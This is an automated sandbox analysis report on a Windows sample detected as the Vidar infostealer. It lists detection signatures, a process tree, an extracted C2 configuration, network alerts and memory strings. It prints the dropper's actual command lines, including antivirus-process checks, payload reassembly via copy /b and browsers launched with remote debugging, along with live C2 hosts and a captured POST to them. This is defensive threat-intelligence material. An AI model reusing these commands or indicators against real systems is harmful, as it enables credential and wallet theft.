Windows Analysis Report
nB52P46OJD.exe

Overview

General Information

Sample name: nB52P46OJD.exe (renamed because original name is a hash value)
Original sample name: c6e90b3a98ecb4ab74a9aaf8155d1bc0.exe
Analysis ID: 1576056
MD5: c6e90b3a98ecb4ab74a9aaf8155d1bc0
SHA1: 0a29a790ab82dda61c5622586fbdbf46223b2989
SHA256: 08bae1bb8a881ff6a6a25f988d73def21b6d65d262960bc4706534f479b85b62
Tags: exe, user-abuse_ch

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • nB52P46OJD.exe (PID: 7768 cmdline: "C:\Users\user\Desktop\nB52P46OJD.exe" MD5: C6E90B3A98ECB4AB74A9AAF8155D1BC0)
    • cmd.exe (PID: 7852 cmdline: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7940 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7948 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7984 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7992 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8032 cmdline: cmd /c md 615578 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 8048 cmdline: findstr /V "applied" Manually MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8068 cmdline: cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm w MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Participating.com (PID: 8084 cmdline: Participating.com w MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 2296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 2168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=2184,i,9525037669087929347,3886013468471242407,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 6476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 3720 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2792 --field-trial-handle=2572,i,5816379547716917,6542547351342202876,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • choice.exe (PID: 8100 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 1056 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7920 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2828 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7848 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6452 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3552 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2804,i,4544604587699673004,14473688418498939934,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Participating.com PID: 8084 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: Participating.com PID: 8084 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
            Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Participating.com w, ParentImage: C:\Users\user\AppData\Local\Temp\615578\Participating.com, ParentProcessId: 8084, ParentProcessName: Participating.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2296, ProcessName: chrome.exe
            Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\nB52P46OJD.exe", ParentImage: C:\Users\user\Desktop\nB52P46OJD.exe, ParentProcessId: 7768, ParentProcessName: nB52P46OJD.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, ProcessId: 7852, ProcessName: cmd.exe

            HIPS / PFW / Operating System Protection Evasion

            Source: Process started | Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7852, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7992, ProcessName: findstr.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-12-16T13:46:49.869743+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.8 | 49716 | TCP
            2024-12-16T13:46:52.157474+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.8 | 49718 | TCP
            2024-12-16T13:46:47.571950+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 116.203.12.114 | 443 | TCP

            AV Detection

            Source: https://sedone.online | Avira URL Cloud: Label: malware
            Source: https://sedone.online/2) | Avira URL Cloud: Label: malware
            Source: 0000000B.00000003.1819474121.0000000005326000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
            Source: nB52P46OJD.exe | ReversingLabs: Detection: 18%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
            Source: nB52P46OJD.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.8:49805 version: TLS 1.2
            Source: nB52P46OJD.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: cryptosetup.pdbGCTL source: Participating.com, 0000000B.00000002.2647629721.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, RIMOH4.11.dr
            Source: Binary string: cryptosetup.pdb source: Participating.com, 0000000B.00000002.2647629721.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, RIMOH4.11.dr
            Source: C:\Users\user\Desktop\nB52P46OJD.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\nB52P46OJD.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D4DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00D4DC54
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D5A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00D5A087
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D5A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00D5A1E2
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D4E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00D4E472
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D5A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00D5A570
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D566DC FindFirstFileW,FindNextFileW,FindClose,11_2_00D566DC
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D1C622 FindFirstFileExW,11_2_00D1C622
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D573D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00D573D4
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D57333 FindFirstFileW,FindClose,11_2_00D57333
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D4D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00D4D921
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: chrome.exe | Memory has grown: Private usage: 8MB later: 39MB

            Networking

            Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:49715 -> 116.203.12.114:443
            Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.8:49718
            Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.8:49716
            Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199807592927
            Source: global traffic | HTTP traffic detected: GET /detct0r HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
            Source: Joe Sandbox View | IP Address: 149.154.167.99
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com | Code function: 11_2_00D5D889 InternetReadFile,SetEvent,GetLastError,SetEvent,11_2_00D5D889
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 | Host: sedone.online | Connection: Keep-Alive | Cache-Control: no-cache
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr | String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
            Source: global traffic | DNS traffic detected: DNS query: IuwKjpytGYqQ.IuwKjpytGYqQ
            Source: global traffic | DNS traffic detected: DNS query: t.me
            Source: global traffic | DNS traffic detected: DNS query: sedone.online
            Source: global traffic | DNS traffic detected: DNS query: www.google.com
            Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
            Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
            Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
            Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
            Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
            Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
            Source: unknown | HTTP traffic detected:
                POST / HTTP/1.1
                Content-Type: multipart/form-data; boundary=----EUAIEC2689RIEUKNOH47
                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                Host: sedone.online
                Content-Length: 256
                Connection: Keep-Alive
                Cache-Control: no-cache
            Source: nB52P46OJD.exe | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
            Source: Pizza.0.dr, Participating.com.2.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: Pizza.0.dr, Participating.com.2.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Pizza.0.dr, Participating.com.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Pizza.0.dr, Participating.com.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Pizza.0.dr, Participating.com.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://issuetracker.google.com/200067929
            Source: chrome.exe, 00000011.00000003.2018572062.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018679546.00006C780107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018760052.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018854218.00006C7801098000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://jsbin.com/temexa/4.
            Source: nB52P46OJD.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: nB52P46OJD.exe | String found in binary or memory: http://ocsp.comodoca.com0
            Source: Pizza.0.dr, Participating.com.2.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: Pizza.0.dr, Participating.com.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Pizza.0.dr, Participating.com.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Pizza.0.dr, Participating.com.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: chrome.exe, 00000011.00000003.2019573271.00006C7801170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019158969.00006C7800700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018572062.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019519827.00006C78003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018679546.00006C780107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019375269.00006C780100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019324643.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018760052.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019098163.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018724142.00006C78010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2018854218.00006C7801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
            Source: chrome.exe, 00000011.00000003.2036975276.00006C7800EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: Participating.com, 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp, Pizza.0.dr, Participating.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: chrome.exe, 00000011.00000003.2036975276.00006C7800EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/update2/response
            Source: Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, DBAI5P.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
